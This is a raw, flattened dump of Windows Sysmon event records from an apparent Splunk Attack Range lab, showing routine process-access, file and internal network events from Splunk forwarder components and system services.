11:31:46.713{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223960Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:46.713{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223959Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:46.713{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1B22-6216-7A05-000000003902}2792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223958Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:46.713{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1B22-6216-7A05-000000003902}2792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223957Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:46.714{4F8D34B0-1B22-6216-7A05-000000003902}2792C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223956Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:46.588{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=792F66B86890C8DD995BA36CA4102307,SHA256=61C0D62568E8CBBFE0BC835C042D9835E63C4E3EDBFC4BE5D039ED23ECEB5A5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300219Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:46.290{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB13D8C3B2F5EA754FFCF9CD9BFB3362,SHA256=C5AA254C952D307D6990BB488E00D718F46DE6172FF1F813D5CDBDB26AC528F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223987Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:47.948{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04A7962AECB8D1C04A352C649A4F72B7,SHA256=4E723DAFEAC26B0F96C3DFCA04E0397AF5BDAFD4531793ACD82313DDF6C384DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300220Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:47.310{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBC40E710E20D73097485B440EF1E110,SHA256=64B531608EF10CFD3486F6A0AA41F9C13F4181CF3CF03080987CA6F8C6F5645C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223986Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:47.745{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BD62C83E000DFB35490583D1B9F1237A,SHA256=72059134F67C1AEFF4521C24CEC229E3799C4E94130E788C3DA3797F767C8477,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223985Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:44.577{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51823-false10.0.1.12-8000- 10341000x8000000000000000223984Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:47.213{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1B23-6216-7B05-000000003902}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223983Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:47.213{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223982Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:47.213{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223981Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:47.213{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223980Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:47.213{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223979Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:47.213{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223978Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:47.213{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223977Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:47.213{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223976Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:47.213{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223975Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:47.213{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223974Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:47.213{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1B23-6216-7B05-000000003902}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223973Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:47.213{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1B23-6216-7B05-000000003902}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223972Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:47.214{4F8D34B0-1B23-6216-7B05-000000003902}3956C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000224002Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:48.980{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D6D593D1585FF47ABE86ADBA7F53E8B,SHA256=D658EACBAC3A01A03C7B63034597209FCAF3788F60B2E0307295F7C3D531E193,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000300222Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:48.327{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40BC9555CEAF86874564A368398BC1F1,SHA256=302DFC2825CBC31C6ED9E27B2035D4575E63FFC9B6065D20E9EEC59AA30E71C9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000300221Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:31:45.669{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49707-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000224001Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:48.870{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1B24-6216-7C05-000000003902}3176C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000224000Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:48.870{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223999Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:48.870{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223998Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:31:48.870{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223997Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 